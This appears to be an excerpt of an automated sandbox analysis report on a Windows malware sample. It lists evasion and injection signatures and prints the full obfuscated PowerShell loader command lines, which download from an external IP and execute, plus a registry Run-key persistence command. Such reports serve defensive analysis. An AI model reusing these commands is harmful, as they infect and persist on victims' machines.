          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B66620 mov eax, dword ptr fs:[00000030h]15_2_23B66620
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B68620 mov eax, dword ptr fs:[00000030h]15_2_23B68620
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3262C mov eax, dword ptr fs:[00000030h]15_2_23B3262C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B33616 mov eax, dword ptr fs:[00000030h]15_2_23B33616
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B33616 mov eax, dword ptr fs:[00000030h]15_2_23B33616
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72619 mov eax, dword ptr fs:[00000030h]15_2_23B72619
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B61607 mov eax, dword ptr fs:[00000030h]15_2_23B61607
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE609 mov eax, dword ptr fs:[00000030h]15_2_23BAE609
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6F603 mov eax, dword ptr fs:[00000030h]15_2_23B6F603
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h]15_2_23B4260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h]15_2_23B4260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h]15_2_23B4260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h]15_2_23B4260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h]15_2_23B4260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h]15_2_23B4260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h]15_2_23B4260B

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtQuerySystemInformation: Direct from: 0x1146E7FJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3010000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: CAFAF4Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.baJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.baJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"Jump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$reglorified = 1;$toupe='s';$toupe+='ubstrin';$toupe+='g';function tyknende($frontotemporal){$kommandodeles=$frontotemporal.length-$reglorified;for($nummerordens=5;$nummerordens -lt $kommandodeles;$nummerordens+=6){$crpe+=$frontotemporal.$toupe.invoke( $nummerordens, $reglorified);}$crpe;}function biblioteksfilerne($kedelcentralen){& ($dataanlgs) ($kedelcentralen);}$udskilles=tyknende 'snuggmfo.oro loo zka.anistoo,lflan lsmaaga len,/ u fi5h.gge.mawse0 xant lint(reae wpaikiitorden stnidsk ftom.gtswgrasssgivin hovs.nas.ertoutbr kvot,1goupi0poess. ook0recr,;tilkn b.arwunderitorrinkalku6rekor4vandm; oldt godkexslamb6anvis4overw;rente taalrrrgssvsvige:ae,li1synan2 rupi1 ukat.,onra0lo.ds)apoth louirgtempee overcgenfokiso.co syst/menis2ioevr0stan.1varsl0 sses0subst1 coex0un af1raias ildnefdo,ediovnhur,etere luk,fareahonobblx ara/ ekvi1kha.e2folk,1b.lls. besk0forme ';$primevally=tyknende '.rsteuhy,osssquibe,parerrewar-tenanafictigaffaee parn jerrt myrt ';$dien=tyknende 'synsmhmilittvajedtdarenps.eep:dob,o/perpl/erase8siren7nonwe. jack1 ,ive2 over1 ar,g.beret1retst0maler5reded..ippe5spare4count/sculpochapoxmec da d,pllbl eduslippr imuli cplma indi2ret t0libet9thick.no,enspostnmjo,dbi.onsu ';$longrun=tyknende 'folke>patte ';$dataanlgs=tyknende ' verdi unree nonvxtppe ';$traditions='nashira';biblioteksfilerne (tyknende 'gregssunassegrmmetpersi-hvalfcpieb.o inv n cinntherdseprve nindtetbrede argum-refitppla tambelptafgrfhklar knivbtc,rva:morte\konomgslutkrs.igey s,agnblahltpne,me stern silkdtalene fejnsmes n.fritit submxbismutcosmo under-rhyptv ext.a ,atol f,inupubliekolla nook $skrivtrubler.orynachancdzonalige.trtc.nidi noncokitnin uds,sorig ;recep ');biblioteksfilerne (tyknende ' repai edelfbasqu diff(hoppetstucce sce,s ivsvtepe.i-.odstpbarriatyroltsysgth ang calcatpatro:rigad\isoclgunordr aggryamputn,hrootbordhe agttn myecdgui ee revesflere.ps,udtplastxpantet prun) snot{d sene vindxleafsikultutsonor} sies;limen ');$kursusoversigten = tyknende 'servoe ontcn gashbi.loounchi preco%vagnuakodiappseu,pse,igdalt.baperu.tinteraspa.l%stuve\dismevcirc.akerattfarvee sprarsleysps.angasha rsgutsesunmeweylvahnsundheafspnsksehu2wiens4 para.besteapatruc .llecmyone resou&parad&t.lip discuedurescbogtihlgel,okilot re.ia$b sni ';biblioteksfilerne (tyknende 'blidh$kitnigtoxollstrbsogeckobs,ffeaaristltrans:tun,ntmephii.ammetde uta.apitrsto.m= i.er(modtac presmindevdafhng henst/tenebcopt.i im,r$hord,k trykufje nr skgls beliusukkesnyoprokomm,vtelesepharmr aritsl mpnianligg rimot tweeeempirndi.yo)majus ');biblioteksfilerne (tyknende 'citat$comp.gend,sl trygoajlefbweddea br,dl haa.:hold fslidsarefusel.ngtraarvad punki st rg,ross=sk.iv$handgdalhusigaulle diaznfradr. oversstephp sheblservaigymnatamtsv(ouvri$alpevlhospiod apen idocgse.ulrsustiu griln spar)ele h ');$dien=$faerdig[0];biblioteksfilerne (tyknende ' girl$ un ega droldredgomortabover,a b.ba
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$reglorified = 1;$toupe='s';$toupe+='ubstrin';$toupe+='g';function tyknende($frontotemporal){$kommandodeles=$frontotemporal.length-$reglorified;for($nummerordens=5;$nummerordens -lt $kommandodeles;$nummerordens+=6){$crpe+=$frontotemporal.$toupe.invoke( $nummerordens, $reglorified);}$crpe;}function biblioteksfilerne($kedelcentralen){& ($dataanlgs) ($kedelcentralen);}$udskilles=tyknende 'snuggmfo.oro loo zka.anistoo,lflan lsmaaga len,/ u fi5h.gge.mawse0 xant lint(reae wpaikiitorden stnidsk ftom.gtswgrasssgivin hovs.nas.ertoutbr kvot,1goupi0poess. ook0recr,;tilkn b.arwunderitorrinkalku6rekor4vandm; oldt godkexslamb6anvis4overw;rente taalrrrgssvsvige:ae,li1synan2 rupi1 ukat.,onra0lo.ds)apoth louirgtempee overcgenfokiso.co syst/menis2ioevr0stan.1varsl0 sses0subst1 coex0un af1raias ildnefdo,ediovnhur,etere luk,fareahonobblx ara/ ekvi1kha.e2folk,1b.lls. besk0forme ';$primevally=tyknende '.rsteuhy,osssquibe,parerrewar-tenanafictigaffaee parn jerrt myrt ';$dien=tyknende 'synsmhmilittvajedtdarenps.eep:dob,o/perpl/erase8siren7nonwe. jack1 ,ive2 over1 ar,g.beret1retst0maler5reded..ippe5spare4count/sculpochapoxmec da d,pllbl eduslippr imuli cplma indi2ret t0libet9thick.no,enspostnmjo,dbi.onsu ';$longrun=tyknende 'folke>patte ';$dataanlgs=tyknende ' verdi unree nonvxtppe ';$traditions='nashira';biblioteksfilerne (tyknende 'gregssunassegrmmetpersi-hvalfcpieb.o inv n cinntherdseprve nindtetbrede argum-refitppla tambelptafgrfhklar knivbtc,rva:morte\konomgslutkrs.igey s,agnblahltpne,me stern silkdtalene fejnsmes n.fritit submxbismutcosmo under-rhyptv ext.a ,atol f,inupubliekolla nook $skrivtrubler.orynachancdzonalige.trtc.nidi noncokitnin uds,sorig ;recep ');biblioteksfilerne (tyknende ' repai edelfbasqu diff(hoppetstucce sce,s ivsvtepe.i-.odstpbarriatyroltsysgth ang calcatpatro:rigad\isoclgunordr aggryamputn,hrootbordhe agttn myecdgui ee revesflere.ps,udtplastxpantet prun) snot{d sene vindxleafsikultutsonor} sies;limen ');$kursusoversigten = tyknende 'servoe ontcn gashbi.loounchi preco%vagnuakodiappseu,pse,igdalt.baperu.tinteraspa.l%stuve\dismevcirc.akerattfarvee sprarsleysps.angasha rsgutsesunmeweylvahnsundheafspnsksehu2wiens4 para.besteapatruc .llecmyone resou&parad&t.lip discuedurescbogtihlgel,okilot re.ia$b sni ';biblioteksfilerne (tyknende 'blidh$kitnigtoxollstrbsogeckobs,ffeaaristltrans:tun,ntmephii.ammetde uta.apitrsto.m= i.er(modtac presmindevdafhng henst/tenebcopt.i im,r$hord,k trykufje nr skgls beliusukkesnyoprokomm,vtelesepharmr aritsl mpnianligg rimot tweeeempirndi.yo)majus ');biblioteksfilerne (tyknende 'citat$comp.gend,sl trygoajlefbweddea br,dl haa.:hold fslidsarefusel.ngtraarvad 